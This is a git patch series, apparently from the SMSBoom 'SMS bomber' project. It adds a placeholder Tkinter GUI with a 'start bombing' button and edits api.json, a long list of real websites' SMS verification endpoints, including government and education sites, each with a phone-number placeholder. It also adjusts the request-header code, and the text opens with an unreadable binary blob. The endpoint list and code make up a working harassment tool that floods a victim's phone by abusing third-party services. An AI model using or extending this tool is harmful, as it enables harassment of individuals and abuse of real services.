zob&&5F8pG@@Rj}2iK8n30Ju#ZGG*I(D(qVU0;x+!y?+6A&o1EE_1+rzP8puTuIDk| zlja)0bzh*_I!%o>k2LDrZC7lkf$Lk1PXGEtuXxZo9GfH102QVQis+yA6|CrruWUu$ zW2zOseynRnlM^pl(FYT&R^*>tx1y~{*@~P~H?8Q0sh6!tnEp?!pQnGcuKM!$PgeBd z!$S)iyzT$ykd;+uW^ESMfB$61ie?wT{}&;9XQM&@4NRlVd&G<)Cd%*VVaTu&Pv= zl4eL+K(0u-peWUVpwxmLQQVu#iW>n@d6rjIMwCQeffbcO;HIE4C_*8#7#>1krOB{$ zQB!0QRtyG3VPQ=cAD~i4=9QWZw@ic+7*69f(W7C}VA2?hU`Z?+f%hWk_zI&d;hL_` z*E3Rkfv**^LZuSR=|yoK%bZCGl_C{Fm!(K2ZPaBRZ&46NU|d_$wPkuC7w@K$-E5&8 ziP4#OzPo79+R|z=Q#|)P8%mxdvP6PlV?-rg?&Ny)VpK&1HG!u$#C%$jg(7#hURkG8 zv9hst2In^-;S{Bk*@m`Kpu=5F!`Q?I-YKiq`1xFT;e3{3=|-|1G7o@9VS~Y7^MMQ| z6u{5`0@o#-Y0IlJ%$s*cVNGhZq^4eKGKE%nzJ0cp_p5m>(_O?P64GgQg&{fwvDAoA6vT!1 z2n}%@6eA!m3ef} Date: Tue, 3 May 2022 22:14:40 +0800 Subject: [PATCH 2/8] =?UTF-8?q?=E2=9C=A8=20feat:=20=E6=8F=90=E4=BA=A4?= =?UTF-8?q?=E4=B8=80=E4=B8=AAGUI=E7=9A=84=E4=BC=AA=E5=AE=9E=E7=8E=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * 注意:GUI版本暂且不可使用.只是一个伪实现 --- smsboom_GUI.py | 57 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 smsboom_GUI.py diff --git a/smsboom_GUI.py b/smsboom_GUI.py new file mode 100644 index 0000000..039c610 --- /dev/null +++ b/smsboom_GUI.py @@ -0,0 +1,57 @@ +from tkinter import Tk, StringVar +from tkinter import ttk + + +class InputWidget(ttk.Frame): + """输入框,确认框""" + + def __init__(self, parent=None): + ttk.Frame.__init__(self, parent) + self.parent = parent + self.columnconfigure(0, weight=1) + self.rowconfigure(0, weight=1) + self.phone = StringVar() + self.createWidget() + + for child in self.winfo_children(): + child.grid_configure(padx=5, pady=5) + + self.pack() + + def createWidget(self): + """InputWidget""" + ttk.Label(self, text="手机号:").grid(column=0, row=0, sticky='nsew') + ttk.Entry(self, textvariable=self.phone).grid( + column=1, row=0, columnspan=3, sticky='nsew') + ttk.Button(self, text="启动轰炸").grid( + column=4, row=0, sticky='nsew') + + +class Application(ttk.Frame): + """APP main frame""" + + def __init__(self, parent=None): + ttk.Frame.__init__(self, parent) + self.parent = parent + # 伸缩 + self.columnconfigure(0, weight=1) + self.rowconfigure(0, weight=1) + self.createWidget() + # 间隔 + for child in self.winfo_children(): + child.grid_configure(padx=5, pady=5) + + self.pack() + + def createWidget(self): + """Widget""" + input_wiget = InputWidget(self) + + +if __name__ == "__main__": + root = Tk() + root.title("SMSBoom - 短信轰炸机 ©落落") + root.columnconfigure(0, weight=1) + root.rowconfigure(0, weight=1) + Application(parent=root) + root.mainloop() From 805dbc0cbd257ce3bc8b2f797894fb4106e4c884 Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Tue, 3 May 2022 22:19:44 +0800 Subject: [PATCH 3/8] =?UTF-8?q?=F0=9F=90=9E=20fix:=20=E4=BF=AE=E5=A4=8D?= =?UTF-8?q?=E4=B8=80=E4=B8=AA=E8=87=AA=E5=8A=A8=E6=B7=BB=E5=8A=A0Referer?= =?UTF-8?q?=E7=9A=84bug?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- api.json | 300 ++++++++++++--------------------------------- flask_app/model.py | 8 +- utils.py | 8 +- 3 files changed, 85 insertions(+), 231 deletions(-) diff --git a/api.json b/api.json index d5cfd49..300debf 100755 --- a/api.json +++ b/api.json @@ -16,9 +16,7 @@ "desc": "网易云游戏", "url": "https://n.cg.163.com/api/v1/phone-captchas/86-[phone]", "method": "POST", - "header": { - "Referer": "https://n.cg.163.com/api/v1/phone-captchas/86-[phone]" - }, + "header": "", "data": { "etc": { "validate": "" @@ -54,54 +52,42 @@ "desc": "微爱app", "url": "http://api.welove520.com/v5/account/phone/verifyCode/send?phone_number=[phone]&client_id=464847866_[timestamp]&type=6&area_code=86&app_key=ac5f34563a4344c4&sig=xvP64W04tR%2FNJoZEJEoJySmlIXU%3D", "method": "POST", - "header": { - "Referer": "http://api.welove520.com/v5/account/phone/verifyCode/send?phone_number=[phone]&client_id=464847866_[timestamp]&type=6&area_code=86&app_key=ac5f34563a4344c4&sig=xvP64W04tR%2FNJoZEJEoJySmlIXU%3D" - }, + "header": "", "data": "" }, { "desc": "返利app(24小时限制)", "url": "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery21105357980471043338_[timestamp]&mobile=[phone]&countrycode=86&mobilestep=1&_=[timestamp]", "method": "GET", - "header": { - "Referer": "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery21105357980471043338_[timestamp]&mobile=[phone]&countrycode=86&mobilestep=1&_=[timestamp]" - }, + "header": "", "data": "" }, { "desc": "酷安(一天只能一次)", "url": "https://account.coolapk.com/auth/login?type=mobile", "method": "POST", - "header": { - "Referer": "https://account.coolapk.com/auth/login?type=mobile" - }, + "header": "", "data": "submit=1&requestHash=c2592a6dr9x510&country=86&mobile=[phone]&captcha=&randomNumber=0undefined7952784010774208" }, { "desc": "广东高考报名web", "url": "https://pg.eeagd.edu.cn/ks/public/kszc/zcyzm.jsmeb", "method": "POST", - "header": { - "Referer": "https://pg.eeagd.edu.cn/ks/public/kszc/zcyzm.jsmeb" - }, + "header": "", "data": "[phone]" }, { "desc": "广东教育翔云", "url": "https://gl.gdedu.gov.cn/api-service/captcha?phoneNumber=[phone]&captchaType=QUERY_ADMIN", "method": "GET", - "header": { - "Referer": "https://gl.gdedu.gov.cn/api-service/captcha?phoneNumber=[phone]&captchaType=QUERY_ADMIN" - }, + "header": "", "data": "" }, { "desc": "迪卡侬", "url": "https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code", "method": "POST", - "header": { - "Referer": "https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code" - }, + "header": "", "data": { "countryCode": "CN", "mobile": "[phone]" @@ -111,9 +97,7 @@ "desc": "股海网", "url": "https://www.guhai.com.cn/front/member/sendSmsCode", "method": "POST", - "header": { - "Referer": "https://www.guhai.com.cn/front/member/sendSmsCode" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -122,9 +106,7 @@ "desc": "LLL的个人blog", "url": "http://www.lll.plus/sendCode/", "method": "POST", - "header": { - "Referer": "http://www.lll.plus/sendCode/" - }, + "header": "", "data": { "tel": "[phone]", "forgetPwd": "" @@ -134,9 +116,7 @@ "desc": "企米子", "url": "https://www.xcxui.com/index/register/getcode.html", "method": "POST", - "header": { - "Referer": "https://www.xcxui.com/index/register/getcode.html" - }, + "header": "", "data": { "tel": "[phone]" } @@ -145,9 +125,7 @@ "desc": "蒲公英", "url": "https://id.pgyer.com/user/getRegisterCode", "method": "POST", - "header": { - "Referer": "https://id.pgyer.com/user/getRegisterCode" - }, + "header": "", "data": { "tel": "[phone]", "callingCode": "86", @@ -158,9 +136,7 @@ "desc": "百卓优采", "url": "https://erp.abiz.com/mobilecode/sendMobileCode", "method": "POST", - "header": { - "Referer": "https://erp.abiz.com/mobilecode/sendMobileCode" - }, + "header": "", "data": { "mobile": "[phone]", "captcha": "" @@ -170,9 +146,7 @@ "desc": "云背篓", "url": "https://brand.yunbeilou.com/index.php/smssend", "method": "POST", - "header": { - "Referer": "https://brand.yunbeilou.com/index.php/smssend" - }, + "header": "", "data": { "phone": "[phone]", "v": "yes" @@ -182,9 +156,7 @@ "desc": "PHP中文网", "url": "https://m.php.cn/account/phone_code.html", "method": "POST", - "header": { - "Referer": "https://m.php.cn/account/phone_code.html" - }, + "header": "", "data": { "phone": "[phone]" } @@ -193,9 +165,7 @@ "desc": "12321", "url": "http://dhba.12321.cn/api/verifycode", "method": "POST", - "header": { - "Referer": "http://dhba.12321.cn/api/verifycode" - }, + "header": "", "data": { "phone": "[phone]" } @@ -204,9 +174,7 @@ "desc": "Testin众测", "url": "https://www.ztestin.com/users/send/vercode", "method": "POST", - "header": { - "Referer": "https://www.ztestin.com/users/send/vercode" - }, + "header": "", "data": { "phone": "[phone]", "type": "register", @@ -217,9 +185,7 @@ "desc": "海尔", "url": "http://maker.haier.net/client/user/sendregistervcode.html", "method": "POST", - "header": { - "Referer": "http://maker.haier.net/client/user/sendregistervcode.html" - }, + "header": "", "data": { "account": "[phone]" } @@ -228,9 +194,7 @@ "desc": "飞猫云", "url": "https://www.feimaoyun.com/index.php/invite/h5sendmsg", "method": "POST", - "header": { - "Referer": "https://www.feimaoyun.com/index.php/invite/h5sendmsg" - }, + "header": "", "data": { "pcode": "+86", "phone": "[phone]" @@ -240,9 +204,7 @@ "desc": "华觉数字化平台", "url": "https://end.huajuetech.com/api/sendCode", "method": "POST", - "header": { - "Referer": "https://end.huajuetech.com/api/sendCode" - }, + "header": "", "data": { "mobile": "[phone]", "email": "null", @@ -253,9 +215,7 @@ "desc": "问政江西", "url": "https://wenz.jxnews.com.cn/ms/index.php/Home/User/get_yzm", "method": "POST", - "header": { - "Referer": "https://wenz.jxnews.com.cn/ms/index.php/Home/User/get_yzm" - }, + "header": "", "data": { "phone": "[phone]" } @@ -264,9 +224,7 @@ "desc": "河南智慧党建", "url": "http://api.hndyjyfw.gov.cn/djapi/mobileVerify", "method": "POST", - "header": { - "Referer": "http://api.hndyjyfw.gov.cn/djapi/mobileVerify" - }, + "header": "", "data": { "phone": "[phone]", "verifytype": "1" @@ -276,9 +234,7 @@ "desc": "陆陆陆云安全", "url": "https://cloud.666idc.com/index/login/sendsms.html", "method": "POST", - "header": { - "Referer": "https://cloud.666idc.com/index/login/sendsms.html" - }, + "header": "", "data": { "mobile": "[phone]", "mobile_pre": "86" @@ -288,9 +244,7 @@ "desc": "网易", "url": "https://dz.blizzard.cn/action/user/mobile/captcha", "method": "POST", - "header": { - "Referer": "https://dz.blizzard.cn/action/user/mobile/captcha" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -299,9 +253,7 @@ "desc": "码云社", "url": "https://www.codeseeding.com/loginUser/toSend", "method": "POST", - "header": { - "Referer": "https://www.codeseeding.com/loginUser/toSend" - }, + "header": "", "data": { "phone": "[phone]" } @@ -310,9 +262,7 @@ "desc": "人才山东", "url": "http://sso.rcsd.cn/regist/getVerifyCode", "method": "POST", - "header": { - "Referer": "http://sso.rcsd.cn/regist/getVerifyCode" - }, + "header": "", "data": { "personcall": "[phone]" } @@ -321,9 +271,7 @@ "desc": "水利部", "url": "http://sso.mwr.cn/suserRegister/verifyAccountAndphone.action", "method": "POST", - "header": { - "Referer": "http://sso.mwr.cn/suserRegister/verifyAccountAndphone.action" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -332,9 +280,7 @@ "desc": "七联大学", "url": "http://ut7.whu.edu.cn/Home/studentCommon/Student_getVerifyCode", "method": "POST", - "header": { - "Referer": "http://ut7.whu.edu.cn/Home/studentCommon/Student_getVerifyCode" - }, + "header": "", "data": { "phoneNumber": "[phone]", "sendType": "0" @@ -344,9 +290,7 @@ "desc": "闪德资讯", "url": "https://www.0101ssd.com/user/sendmsg", "method": "POST", - "header": { - "Referer": "https://www.0101ssd.com/user/sendmsg" - }, + "header": "", "data": { "mobile": "[phone]", "event": "register" @@ -356,9 +300,7 @@ "desc": "江苏省名师空中课堂", "url": "https://mskzkt.jse.edu.cn/baseApi/user/code/", "method": "POST", - "header": { - "Referer": "https://mskzkt.jse.edu.cn/baseApi/user/code/" - }, + "header": "", "data": { "mobile": "[phone]", "type": "1" @@ -368,9 +310,7 @@ "desc": "CSFF短片", "url": "https://csff.cutv.com/wapi/users/sendregcode", "method": "POST", - "header": { - "Referer": "https://csff.cutv.com/wapi/users/sendregcode" - }, + "header": "", "data": { "telphone": "[phone]" } @@ -379,9 +319,7 @@ "desc": "广西人社厅", "url": "http://rswb.gx12333.net/member/getRegisterphoneCode.jspx", "method": "POST", - "header": { - "Referer": "http://rswb.gx12333.net/member/getRegisterphoneCode.jspx" - }, + "header": "", "data": { "aae005": "[phone]", "aac003": "刘萌萌", @@ -393,9 +331,7 @@ "desc": "麦克赛尔数字映像", "url": "https://www.maxell-dm.cn/Code/CheckImage.aspx", "method": "POST", - "header": { - "Referer": "https://www.maxell-dm.cn/Code/CheckImage.aspx" - }, + "header": "", "data": { "action": "send", "txtMember_Name": "[phone]" @@ -405,9 +341,7 @@ "desc": "宝提分", "url": "http://main.jiajiaozaixian.com//reginfo/sendRankByMobileReginfo.action", "method": "POST", - "header": { - "Referer": "http://main.jiajiaozaixian.com//reginfo/sendRankByMobileReginfo.action" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -416,9 +350,7 @@ "desc": "选型系统", "url": "http://www.cnppump.ltd/Service/UserHandler.ashx", "method": "GET", - "header": { - "Referer": "http://www.cnppump.ltd/Service/UserHandler.ashx" - }, + "header": "", "data": { "cmd": "GetTelVerifyCode", "Tel": "[phone]" @@ -428,9 +360,7 @@ "desc": "千里马网信科技", "url": "http://vip.qianlima.com/rest/u/api/user/register/mobile/code", "method": "POST", - "header": { - "Referer": "http://vip.qianlima.com/rest/u/api/user/register/mobile/code" - }, + "header": "", "data": { "tips": "1", "shouji": "[phone]" @@ -440,9 +370,7 @@ "desc": "保定云", "url": "https://baodingyun.com.cn/register/send_registerSMS.html", "method": "POST", - "header": { - "Referer": "https://baodingyun.com.cn/register/send_registerSMS.html" - }, + "header": "", "data": { "phone": "[phone]" } @@ -451,9 +379,7 @@ "desc": "欢动游戏", "url": "http://www.gm5.com/auth/registerSms.html", "method": "POST", - "header": { - "Referer": "http://www.gm5.com/auth/registerSms.html" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -462,9 +388,7 @@ "desc": "迈威", "url": "https://www.maiwe.com.cn/index/sendcode.html", "method": "GET", - "header": { - "Referer": "https://www.maiwe.com.cn/index/sendcode.html" - }, + "header": "", "data": { "tel": "[phone]" } @@ -473,54 +397,42 @@ "desc": "憨鼠社区", "url": "https://www.dehua.net/include/ajax.php?service=siteConfig&action=getphoneVerify&type=signup&phone=[phone]&areaCode=86", "method": "GET", - "header": { - "Referer": "https://www.dehua.net/include/ajax.php?service=siteConfig&action=getphoneVerify&type=signup&phone=[phone]&areaCode=86" - }, + "header": "", "data": {} }, { "desc": "天鹅到家", "url": "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", "method": "GET", - "header": { - "Referer": "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112" - }, + "header": "", "data": {} }, { "desc": "诺达筑工", "url": "http://ks.ndzhugong.com/getVerificationCode?phone=[phone]&password=&smscode=", "method": "GET", - "header": { - "Referer": "http://ks.ndzhugong.com/getVerificationCode?phone=[phone]&password=&smscode=" - }, + "header": "", "data": {} }, { "desc": "栋才智慧", "url": "http://211.149.170.226:8201/dczp-cloud-client/rrs/user/sendSms?[phone]&[phone]&smsMode=2", "method": "GET", - "header": { - "Referer": "http://211.149.170.226:8201/dczp-cloud-client/rrs/user/sendSms?[phone]&[phone]&smsMode=2" - }, + "header": "", "data": {} }, { "desc": "工伤预防网上培训平台", "url": "http://wf.zhuanjipx.com:8084//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=a87c9338-43a1-66ea-8ce7-1b1ac7c39d69", "method": "GET", - "header": { - "Referer": "http://wf.zhuanjipx.com:8084//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=a87c9338-43a1-66ea-8ce7-1b1ac7c39d69" - }, + "header": "", "data": {} }, { "desc": "济宁专技", "url": "https://sdjn-web.yxlearning.com/sendphoneCode.gson", "method": "POST", - "header": { - "Referer": "https://sdjn-web.yxlearning.com/sendphoneCode.gson" - }, + "header": "", "data": { "phone": "[phone]", "sendType": "4" @@ -530,18 +442,14 @@ "desc": "宁夏伊地地质工程有限公司", "url": "http://www.yddzgc.com/bid-app/api/sys/code?phone=[phone]&type=1", "method": "GET", - "header": { - "Referer": "http://www.yddzgc.com/bid-app/api/sys/code?phone=[phone]&type=1" - }, + "header": "", "data": {} }, { "desc": "青春大学说", "url": "http://zycp.qcdxs.com:5001/sms/sendsms", "method": "POST", - "header": { - "Referer": "http://zycp.qcdxs.com:5001/sms/sendsms" - }, + "header": "", "data": { "phone_number": "[phone]" } @@ -550,9 +458,7 @@ "desc": "兴业利达电子招投标平台", "url": "https://api.gzxyld.cn/HuiEbid/HuiEbidServer/doSendSms/getSms", "method": "POST", - "header": { - "Referer": "https://api.gzxyld.cn/HuiEbid/HuiEbidServer/doSendSms/getSms" - }, + "header": "", "data": { "username": "[phone]", "type": "regUser", @@ -563,9 +469,7 @@ "desc": "火象", "url": "https://v1.alphazone-data.cn/academy/api/v1/sendsms", "method": "POST", - "header": { - "Referer": "https://v1.alphazone-data.cn/academy/api/v1/sendsms" - }, + "header": "", "data": { "temp": "1", "phone": "[phone]" @@ -575,9 +479,7 @@ "desc": "中科教育", "url": "https://www.vipexam.cn/user/identifyingCode.action", "method": "POST", - "header": { - "Referer": "https://www.vipexam.cn/user/identifyingCode.action" - }, + "header": "", "data": { "phone": "[phone]" } @@ -586,18 +488,14 @@ "desc": "聚题库", "url": "https://uc.csdhe.com/v1/sms/send?mobile=[phone]&apptype=examWeb", "method": "GET", - "header": { - "Referer": "https://uc.csdhe.com/v1/sms/send?mobile=[phone]&apptype=examWeb" - }, + "header": "", "data": {} }, { "desc": "苏州高新区教育局", "url": "https://jssnd.edu.cn/apiu/v1/register/auth", "method": "POST", - "header": { - "Referer": "https://jssnd.edu.cn/apiu/v1/register/auth" - }, + "header": "", "data": { "phone": "[phone]" } @@ -606,18 +504,14 @@ "desc": "专业技术人员继续教育平台", "url": "http://zhuanjipx.com:8082//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=685110c6-cef4-bb01-8f4d-19ea89f4d3f8", "method": "GET", - "header": { - "Referer": "http://zhuanjipx.com:8082//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=685110c6-cef4-bb01-8f4d-19ea89f4d3f8" - }, + "header": "", "data": {} }, { "desc": "泰安专技", "url": "https://sdta-web.yxlearning.com/sendphoneCode.gson", "method": "POST", - "header": { - "Referer": "https://sdta-web.yxlearning.com/sendphoneCode.gson" - }, + "header": "", "data": { "phone": "[phone]", "sendType": "4" @@ -627,9 +521,7 @@ "desc": "漏洞银行", "url": "https://www.bugbank.cn/api/verifymobile", "method": "POST", - "header": { - "Referer": "https://www.bugbank.cn/api/verifymobile" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -638,9 +530,7 @@ "desc": "中国劳动保障新闻网", "url": "https://www.clssn.com/jhxtapi/web/Login/sendSmsCode", "method": "POST", - "header": { - "Referer": "https://www.clssn.com/jhxtapi/web/Login/sendSmsCode" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -649,9 +539,7 @@ "desc": "广东省心理学会", "url": "http://gpa-gd.scnu.edu.cn/member/index/public_send_code.html", "method": "POST", - "header": { - "Referer": "http://gpa-gd.scnu.edu.cn/member/index/public_send_code.html" - }, + "header": "", "data": { "phone": "[phone]" } @@ -660,9 +548,7 @@ "desc": "费耘网", "url": "https://www.feeclouds.com/homepage/register/send", "method": "POST", - "header": { - "Referer": "https://www.feeclouds.com/homepage/register/send" - }, + "header": "", "data": { "mobile": "[phone]" } @@ -684,18 +570,14 @@ "desc": "甜糖app", "url": "http://tiantang.mogencloud.com/web/api/login/code?phone=[phone]", "method": "POST", - "header": { - "Referer": "http://tiantang.mogencloud.com/web/api/login/code?phone=[phone]" - }, + "header": "", "data": "" }, { "desc": "网心云APP", "url": "https://account-box.onethingpcs.com/xluser.core.login/v3/sendsms", "method": "POST", - "header": { - "Referer": "https://account-box.onethingpcs.com/xluser.core.login/v3/sendsms" - }, + "header": "", "data": { "protocolVersion": "301", "sequenceNo": "1000001", @@ -722,27 +604,21 @@ "desc": "乐教乐学", "url": "http://id.lejiaolexue.com/api/sendvericode.ashx?phone=[phone]", "method": "GET", - "header": { - "Referer": "http://id.lejiaolexue.com/api/sendvericode.ashx?phone=[phone]" - }, + "header": "", "data": "" }, { "desc": "云杏HIS系统(九明珠)", "url": "http://www.yhis999.cn/yunhis/register.do?act=lable&type=yzm", "method": "POST", - "header": { - "Referer": "http://www.yhis999.cn/yunhis/register.do?act=lable&type=yzm" - }, + "header": "", "data": "{'lxdh': [phone]}" }, { "desc": "秘塔写作", "url": "https://xiezuocat.com/verify?type=signup", "method": "POST", - "header": { - "Referer": "https://xiezuocat.com/verify?type=signup" - }, + "header": "", "data": { "phone": "86-[phone]" } @@ -751,45 +627,35 @@ "desc": "CNMO 网站", "url": "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18306147606011785998_[timestamp]&mobile=[phone]&type=5&_=[timestamp]", "method": "POST", - "header": { - "Referer": "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18306147606011785998_[timestamp]&mobile=[phone]&type=5&_=[timestamp]" - }, + "header": "", "data": "" }, { "desc": "DR钻戒web", "url": "https://elove.darryring.com/api/crm/newGwLogin/getSMSValidCode?phone=[phone]&type=login", "method": "GET", - "header": { - "Referer": "https://elove.darryring.com/api/crm/newGwLogin/getSMSValidCode?phone=[phone]&type=login" - }, + "header": "", "data": "" }, { "desc": "有享云商web", "url": "https://mallapi.yofogo.com/biz-mall-application/v1/user/verifyCode/getVerifyCode?phone=[phone]&descriptionType=1&codeType=2", "method": "GET", - "header": { - "Referer": "https://mallapi.yofogo.com/biz-mall-application/v1/user/verifyCode/getVerifyCode?phone=[phone]&descriptionType=1&codeType=2" - }, + "header": "", "data": "" }, { "desc": "研才教育app", "url": "https://mall.yancais.com/api/sms/send?phone=[phone]", "method": "GET", - "header": { - "Referer": "https://mall.yancais.com/api/sms/send?phone=[phone]" - }, + "header": "", "data": "" }, { "desc": "成卓科技", "url": "https://callphone.hnczkj.cn/app_api/json/sendSms", "method": "POST", - "header": { - "Referer": "https://callphone.hnczkj.cn/app_api/json/sendSms" - }, + "header": "", "data": { "phone": "[phone]", "product": "biyingdianhua_ios", @@ -800,9 +666,7 @@ "desc": "加密电话", "url": "https://m.4009991000.com/valNumQry.action", "method": "POST", - "header": { - "Referer": "https://m.4009991000.com/valNumQry.action" - }, + "header": "", "data": { "appType": "1", "app_id": "5555", @@ -817,36 +681,28 @@ "desc": "快应用美抽", "url": "http://users.seeyouyima.com/xiaomi/connect/?action=getCaptcha&v=2.1.0&app_id=11&platform=7&myclient=1172100000&account=[phone]", "method": "POST", - "header": { - "Referer": "http://users.seeyouyima.com/xiaomi/connect/?action=getCaptcha&v=2.1.0&app_id=11&platform=7&myclient=1172100000&account=[phone]" - }, + "header": "", "data": "" }, { "desc": "小叶子app", "url": "https://dss.xiaoyezi.com/student_app/auth/validate_code?mobile=[phone]&country_code=86", "method": "GET", - "header": { - "Referer": "https://dss.xiaoyezi.com/student_app/auth/validate_code?mobile=[phone]&country_code=86" - }, + "header": "", "data": "" }, { "desc": "牙e在线", "url": "https://yae920.com/login/sendSMS?mobile=[phone]&smsType=02×tamp=[timestamp]", "method": "POST", - "header": { - "Referer": "https://yae920.com/login/sendSMS?mobile=[phone]&smsType=02×tamp=[timestamp]" - }, + "header": "", "data": "mobile=[phone]&smsType=02×tamp=[timestamp]" }, { "desc": "某数图表web(存疑)", "url": "https://dycharts.com/vis/auth/send_signin_sms_code", "method": "POST", - "header": { - "Referer": "https://dycharts.com/vis/auth/send_signin_sms_code" - }, + "header": "", "data": { "phoneNo": "13809213237" } @@ -855,27 +711,21 @@ "desc": "17k小说网app", "url": "http://api.17k.com/user/mobile/[phone]/message?smsType=2&deviceFlag=64e538d8f0cff7bb107dd8c1fba0f5a2&cpsOpid=17Kxiaomi&_filterData=1&device_id=e0c0b30933e42492&channel=0&_versions=1280&merchant=17Kxiaomi&ua=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20M2102J2SC%20Build%2FRKQ1.200826.002%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F100.0.4896.127%20Mobile%20Safari%2F537.36&platform=2&manufacturer=Xiaomi&clientType=1&width=1080&appKey=4037465544&model=M2102J2SC&cpsSource=0&brand=Xiaomi&youthModel=0&height=2206", "method": "GET", - "header": { - "Referer": "http://api.17k.com/user/mobile/[phone]/message?smsType=2&deviceFlag=64e538d8f0cff7bb107dd8c1fba0f5a2&cpsOpid=17Kxiaomi&_filterData=1&device_id=e0c0b30933e42492&channel=0&_versions=1280&merchant=17Kxiaomi&ua=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20M2102J2SC%20Build%2FRKQ1.200826.002%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F100.0.4896.127%20Mobile%20Safari%2F537.36&platform=2&manufacturer=Xiaomi&clientType=1&width=1080&appKey=4037465544&model=M2102J2SC&cpsSource=0&brand=Xiaomi&youthModel=0&height=2206" - }, + "header": "", "data": "" }, { "desc": "汇看点快应用", "url": "https://grzx.brily.cn/api/utils/sendSmsCode?phone=[phone]&type=USER_REG", "method": "POST", - "header": { - "Referer": "https://grzx.brily.cn/api/utils/sendSmsCode?phone=[phone]&type=USER_REG" - }, + "header": "", "data": "" }, { "desc": "核桃编程app", "url": "https://api.hetao101.com/login/v2/account/oauth/verifyCode?phoneNumber=[phone]", "method": "GET", - "header": { - "Referer": "https://api.hetao101.com/login/v2/account/oauth/verifyCode?phoneNumber=[phone]" - }, + "header": "", "data": "" } ] \ No newline at end of file diff --git a/flask_app/model.py b/flask_app/model.py index c8a425d..c13ec30 100755 --- a/flask_app/model.py +++ b/flask_app/model.py @@ -58,9 +58,11 @@ class API(BaseModel): :param API: one API basemodel :return: API basemodel """ - if self.header == "": - self.header = {} - self.header['Referer'] = self.url # 增加 Referer + # 仅仅当传入 phone 参数时添加 Referer + if phone: + if self.header == "": + self.header = {} + self.header['Referer'] = self.url # 增加 Referer else: self.header = self.replace_data(self.header, phone) diff --git a/utils.py b/utils.py index 5e1633b..17f1e0d 100755 --- a/utils.py +++ b/utils.py @@ -101,9 +101,11 @@ class API(BaseModel): :return: API basemodel """ # 如果传入的 header 是字符串,就转为字典. - if self.header == "": - self.header = {} - self.header['Referer'] = self.url # 增加 Referer + # 仅仅当传入 phone 参数时添加 Referer + if phone: + if self.header == "": + self.header = {} + self.header['Referer'] = self.url # 增加 Referer else: self.header = self.replace_data(self.header, phone) From f53c581a0f17a66c89659562a14c7ab50b6c4355 Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Wed, 4 May 2022 01:05:22 +0800 Subject: [PATCH 4/8] =?UTF-8?q?=F0=9F=90=9E=20fix:=20apis=20=E6=A8=A1?= =?UTF-8?q?=E5=9E=8B=E5=A4=84=E7=90=86=E7=9A=84=E4=B8=80=E4=B8=AAbug?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- flask_app/model.py | 23 ++++++++++++++++------- smsboom.py | 2 +- utils.py | 12 ++++++++---- 3 files changed, 25 insertions(+), 12 deletions(-) diff --git a/flask_app/model.py b/flask_app/model.py index c13ec30..d38ed1b 100755 --- a/flask_app/model.py +++ b/flask_app/model.py @@ -4,13 +4,14 @@ from . import db from datetime import datetime from . import ModelView import json -from typing import Union,Optional +from typing import Union, Optional from pydantic import BaseModel default_header = { "User-Agent": "Mozilla/5.0 (Linux; U; Android 10; zh-cn; Mi 10 Build/QKQ1.191117.002) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/79.0.3945.147 Mobile Safari/537.36 XiaoMi/MiuiBrowser/13.5.40" } + class ApisModelVies(ModelView): create_template = 'api_edit.html' edit_template = 'api_edit.html' @@ -22,11 +23,12 @@ class ApisModelVies(ModelView): # 可以导出 csv can_export = True + class Apis(db.Model): id = db.Column(db.Integer, primary_key=True) # 主键 desc = db.Column(db.String(20), default="Default") # 描述 url = db.Column(db.String(9999), unique=True, nullable=False) # 链接 - method = db.Column(db.Enum("GET","POST"), nullable=False) # 请求方法 + method = db.Column(db.Enum("GET", "POST"), nullable=False) # 请求方法 header = db.Column(db.String(9999)) # 请求头 data = db.Column(db.String(9999)) # 请求数据 add_time = db.Column(db.DateTime(), default=datetime.now) # 添加时间 @@ -42,11 +44,14 @@ class API(BaseModel): def replace_data(self, content: Union[str, dict], phone) -> str: # 统一转换成 str 再替换. content = str(content).replace("[phone]", phone).replace( - "[timestamp]", self.timestamp_new()).replace("'",'"') + "[timestamp]", self.timestamp_new()).replace("'", '"') # 尝试 json 化 try: + # json.loads(content) + # print("json成功",content) return json.loads(content) except: + # print("json失败",content) return content def timestamp_new(self) -> str: @@ -59,14 +64,18 @@ class API(BaseModel): :return: API basemodel """ # 仅仅当传入 phone 参数时添加 Referer + # fix: 这段代码很有问题....... if phone: + # 进入的 header 是个字符串 if self.header == "": self.header = {} self.header['Referer'] = self.url # 增加 Referer - else: - 